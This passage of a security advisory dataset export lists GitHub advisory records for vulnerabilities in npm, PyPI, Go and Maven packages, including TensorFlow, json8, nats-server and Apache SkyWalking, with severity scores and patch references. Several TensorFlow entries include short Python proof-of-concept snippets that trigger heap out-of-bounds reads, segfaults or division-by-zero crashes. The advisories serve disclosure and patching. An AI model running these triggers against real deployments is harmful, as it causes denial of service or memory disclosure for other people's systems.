'url': 'https://security.netapp.com/advisory/ntap-20210507-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-400', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T00:18:03Z', 'nvd_published_at': '2021-03-31T08:15:00Z'}" +1.4.0,GHSA-7h43-gx24-p529,2021-04-19T22:36:51Z,2021-05-10T19:17:05Z,,['CVE-2020-7770'],Prototype pollution in json8,"This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json8'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7770'}, {'type': 'WEB', 'url': 'https://github.com/sonnyp/JSON8/commit/2e890261b66cbc54ae01d0c79c71b0fd18379e7e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSON8-1017116'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json8'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:36:51Z', 'nvd_published_at': '2020-11-12T11:15:00Z'}" +1.4.0,GHSA-fpm5-vv97-jfwg,2021-04-15T21:39:07Z,2021-05-18T01:57:24Z,,['CVE-2020-7765'],Uncontrolled Resource Consumption in firebase,"This affects the package @firebase/util before 0.3.4. This vulnerability relates to the deepExtend function within the DeepCopy.ts file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@firebase/util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7765'}, {'type': 'WEB', 'url': 'https://github.com/firebase/firebase-js-sdk/pull/4001'}, {'type': 'WEB', 'url': 'https://github.com/firebase/firebase-js-sdk/commit/9cf727fcc3d049551b16ae0698ac33dc2fe45ada'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FIREBASEUTIL-1038324'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-15T21:39:07Z', 'nvd_published_at': '2020-11-16T12:15:00Z'}" +1.4.0,GHSA-c45w-2wxr-pp53,2021-05-18T17:47:11Z,2021-05-21T14:26:32Z,,['CVE-2021-29582'],Heap OOB read in `tf.raw_ops.Dequantize`,"### Impact +Due to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data: + +```python +import tensorflow as tf + +input_tensor=tf.constant( + [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ + -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ + -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ + -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32) +input_tensor=tf.cast(input_tensor, dtype=tf.quint8) +min_range = tf.constant([-10], shape=[1], dtype=tf.float32) +max_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32) + +tf.raw_ops.Dequantize( + input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED', + narrow_range=True, axis=0, dtype=tf.dtypes.float32) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/26003593aa94b1742f34dc22ce88a1e17776a67d/tensorflow/core/kernels/dequantize_op.cc#L106-L131) accesses the `min_range` and `max_range` tensors in parallel but fails to check that they have the same shape: + +```cc +if (num_slices == 1) { + const float min_range = input_min_tensor.flat()(0); + const float max_range = input_max_tensor.flat()(0); + DequantizeTensor(ctx, input, min_range, max_range, &float_output); +} else { + ... + auto min_ranges = input_min_tensor.vec(); + auto max_ranges = input_max_tensor.vec(); + for (int i = 0; i < num_slices; ++i) { + DequantizeSlice(ctx->eigen_device(), ctx, + input_tensor.template chip<1>(i), min_ranges(i), + max_ranges(i), output_tensor.template chip<1>(i)); + ... + } +} +``` + +### Patches +We have patched the issue in GitHub commit [5899741d0421391ca878da47907b1452f06aaf1b](https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29582'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:47:11Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-8qpm-5c82-rf96,2023-08-08T19:54:27Z,2021-05-06T15:52:02Z,,['CVE-2021-20085'],Prototype Pollution in backbone-query-parameters,Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in backbone-query-parameters 0.4.0 allows a malicious user to inject properties into Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'backbone-query-parameters'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20085'}, {'type': 'WEB', 'url': 'https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/backbone-qp.md'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-26T19:07:16Z', 'nvd_published_at': '2021-04-23T19:15:00Z'}" +1.4.0,GHSA-gwj5-3vfq-q992,2021-05-20T21:07:16Z,2021-05-21T16:22:16Z,,[],"Import loops in account imports, nats-server DoS","(This advisory is canonically ) + +## Problem Description + +An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. + +This issue was fixed publicly in in November 2020. + +The need to call this out as a security issue was highlighted by `snyk.io` and we are grateful for their assistance in doing so. + +Organizations which run a NATS service providing access to accounts run by untrusted third parties are affected. +See below for an important caveat if running such a service. + + +## Affected versions + +#### NATS Server + + * Version 2 prior to 2.2.0 + + 2.0.0 through and including 2.1.9 are vulnerable. + * fixed with nats-io/nats-server PR 1731, commit 2e3c226729 + + +## Impact + +The nats-server could be killed, after consuming resources. + + +## Workaround + +The import cycle requires at least two accounts to work; if you have open account sign-up, then restricting new account sign-up might hinder an attacker. + + +## Solution + +Upgrade the nats-server. + + +## Caveat on NATS with untrusted users + +Running a NATS service which is exposed to untrusted users presents a heightened risk. + +Any remote execution flaw or equivalent seriousness, or denial-of-service by unauthenticated users, will lead to prompt releases by the NATS maintainers. + +Fixes for denial of service issues with no threat of remote execution, when limited to account holders, are likely to just be committed to the main development branch with no special attention. + +Those who are running such services are encouraged to build regularly from git.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/nats-server/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/security/advisories/GHSA-gwj5-3vfq-q992'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:07:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-8796-gc9j-63rv,2021-10-05T16:31:48Z,2021-05-17T20:51:16Z,,[],File upload local preview can run embedded scripts after user interaction,"### Impact + +When uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file, but only after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other users. + +### Patches + +This has been fixed by https://github.com/matrix-org/matrix-react-sdk/pull/5981, which is included in 3.21.0. + +### Workarounds + +There are no known workarounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.21.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-8796-gc9j-63rv'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-react-sdk'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T16:51:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-r35g-4525-29fq,2021-05-18T20:54:44Z,2021-05-21T14:23:58Z,,['CVE-2021-29555'],Division by 0 in `FusedBatchNorm`,"### Impact +An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.FusedBatchNorm`: + +```python +import tensorflow as tf + +x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) +scale = tf.constant([], shape=[0], dtype=tf.float32) +offset = tf.constant([], shape=[0], dtype=tf.float32) +mean = tf.constant([], shape=[0], dtype=tf.float32) +variance = tf.constant([], shape=[0], dtype=tf.float32) +epsilon = 0.0 +exponential_avg_factor = 0.0 +data_format = ""NHWC"" +is_training = False + +tf.raw_ops.FusedBatchNorm( + x=x, scale=scale, offset=offset, mean=mean, + variance=variance, epsilon=epsilon, + exponential_avg_factor=exponential_avg_factor, + data_format=data_format, is_training=is_training) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/828f346274841fa7505f7020e88ca36c22e557ab/tensorflow/core/kernels/fused_batch_norm_op.cc#L295-L297) performs a division based on the last dimension of the `x` tensor: + +```cc +const int depth = x.dimension(3); +const int rest_size = size / depth; +``` + +Since this is controlled by the user, an attacker can trigger a denial of service. + +### Patches +We have patched the issue in GitHub commit [1a2a87229d1d61e23a39373777c056161eb4084d](https://github.com/tensorflow/tensorflow/commit/1a2a87229d1d61e23a39373777c056161eb4084d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r35g-4525-29fq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29555'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1a2a87229d1d61e23a39373777c056161eb4084d'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:54:44Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-grpf-gg7v-5g5h,2021-05-06T17:14:01Z,2021-05-07T15:53:31Z,,['CVE-2020-13921'],SQL Injection in Apache SkyWalking,"Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.skywalking:oap-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13921'}, {'type': 'WEB', 'url': 'https://github.com/apache/skywalking/pull/4970'}, {'type': 'WEB', 'url': 'https://github.com/apache/skywalking/commit/fb7912c6bdda06a233f4b3e18e71a87d3e4a8951'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/08/05/3'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T17:14:01Z', 'nvd_published_at': '2020-08-05T14:15:00Z'}" +1.4.0,GHSA-6xhg-q9c8-rj32,2023-09-12T18:18:48Z,2021-05-18T01:52:54Z,,['CVE-2020-7696'],Credential leak in react-native-fast-image,"This affects all versions before version 8.3.0 of package react-native-fast-image. When an image with `source={{uri: ""..."", headers: { host: ""somehost.com"", authorization: ""..."" }}` is loaded, all other subsequent images will use the same headers, this can lead to signing credentials or other session tokens being leaked to other servers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-native-fast-image'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7696'}, {'type': 'WEB', 'url': 'https://github.com/DylanVann/react-native-fast-image/issues/690'}, {'type': 'WEB', 'url': 'https://github.com/DylanVann/react-native-fast-image/pull/691'}, {'type': 'WEB', 'url': 'https://github.com/DylanVann/react-native-fast-image/commit/4a7cd64f5b0aa40b04d63ccb105ee2b511abe624'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REACTNATIVEFASTIMAGE-572228'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T21:06:00Z', 'nvd_published_at': '2020-07-17T10:15:00Z'}" +1.4.0,GHSA-58qp-5328-v7mh,2022-08-11T00:22:08Z,2021-05-04T17:43:36Z,,['CVE-2021-29486'],cumulative-distribution-function Infinite Loop vulnerability,"### Impact + +* Apps using this library on improper data may crash or go into an infinite-loop +* In the case of a nodejs server-app using this library to act on invalid non-numeric data, the nodejs server may crash. This may affect other users of this server and/or require the server to be rebooted for proper operation. +* In the case of a browser app using this library to act on invalid non-numeric data, that browser may crash or lock up. + +A flaw enabling an infinite-loop was discovered in the code for evaluating the cumulative-distribution-function +of input data. Although the documentation explains that numeric data is required, some users may confuse an array +of strings like [""1"",""2"",""3"",""4"",""5""] for numeric data [1,2,3,4,5] when it is in fact string data. An infinite loop is possible when the +cumulative-distribution-function is evaluated for a given point when the input data is string data rather than type `number`. + +This vulnerability enables an infinite-cpu-loop denial-of-service-attack on any app using npm:cumulative-distribution-function v1.0.3 or earlier if the attacker can supply malformed data to the library. The vulnerability could also manifest if a data source to +be analyzed changes data type from Arrays of number (proper) to Arrays of string (invalid, but undetected by earlier version of the library). + +### Patches + +Users should upgrade to at least v2.0.0, or the latest version. + +Tests for several types of invalid data have been created, and version 2.0.0 has been tested to reject this invalid data by +throwing a `TypeError()` instead of processing it. Developers using this library may wish to adjust their app's code slightly to better tolerate or handle this TypeError. Apps performing proper numeric data validation before sending data to this library should be mostly unaffected by this patch. + +### Workarounds + +The vulnerability can be mitigated in older versions by ensuring that only finite numeric data of type `Array[number]` or `number` is passed to `cumulative-distribution-function` and its `f(x)` function, respectively. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the Github repository at https://github.com/DrPaulBrewer/cumulative-distribution-function","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cumulative-distribution-function'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DrPaulBrewer/cumulative-distribution-function/security/advisories/GHSA-58qp-5328-v7mh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29486'}, {'type': 'WEB', 'url': 'https://github.com/DrPaulBrewer/cumulative-distribution-function/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/DrPaulBrewer/cumulative-distribution-function/pull/8'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/cumulative-distribution-function'}]","{'cwe_ids': ['CWE-20', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-30T17:36:06Z', 'nvd_published_at': '2021-04-30T18:15:00Z'}" +1.4.0,GHSA-xfxf-qw26-hr33,2022-07-05T18:02:04Z,2021-05-06T15:55:43Z,,['CVE-2021-23380'],Arbitrary command execution in roar-pidusage,"This affects all current versions of package roar-pidusage. If attacker-controlled user input is given to the stat function of this package on certain operating systems, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'roar-pidusage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23380'}, {'type': 'PACKAGE', 'url': 'https://github.com/Svjard/pidusage'}, {'type': 'WEB', 'url': 'https://github.com/Svjard/pidusage/blob/772cd2bd675ff7b1244b6fe3d7541692b1b9e42c/lib/stats.js%23L103'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ROARPIDUSAGE-1078528'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T16:48:06Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-g4h2-gqm3-c9wq,2021-05-18T22:09:59Z,2021-05-21T14:23:05Z,,['CVE-2021-29539'],Segfault in tf.raw_ops.ImmutableConst,"### Impact +Calling [`tf.raw_ops.ImmutableConst`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/ImmutableConst) with a `dtype` of `tf.resource` or `tf.variant` results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. + +```python +>>> import tensorflow as tf +>>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name=""/tmp/test.txt"") +... +Segmentation fault +``` + +### Patches +We have patched the issue in 4f663d4b8f0bec1b48da6fa091a7d29609980fa4 and will release TensorFlow 2.5.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. + +### Workarounds +If using `tf.raw_ops.ImmutableConst` in code, you can prevent the segfault by inserting a filter for the `dtype` argument. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g4h2-gqm3-c9wq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29539'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4f663d4b8f0bec1b48da6fa091a7d29609980fa4'}]","{'cwe_ids': ['CWE-681'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:09:59Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-h9px-9vqg-222h,2021-05-18T20:59:57Z,2021-05-21T14:23:51Z,,['CVE-2021-29553'],Heap OOB in `QuantizeAndDequantizeV3`,"### Impact +An attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`: + +```python +import tensorflow as tf + +tf.raw_ops.QuantizeAndDequantizeV3( + input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], + signed_input=False, range_given=False, narrow_range=False, axis=3) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237) does not validate the value of user supplied `axis` attribute before using it to index in the array backing the `input` argument: + +```cc +const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_); +``` + +### Patches +We have patched the issue in GitHub commit [99085e8ff02c3763a0ec2263e44daec416f6a387](https://github.com/tensorflow/tensorflow/commit/99085e8ff02c3763a0ec2263e44daec416f6a387). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': 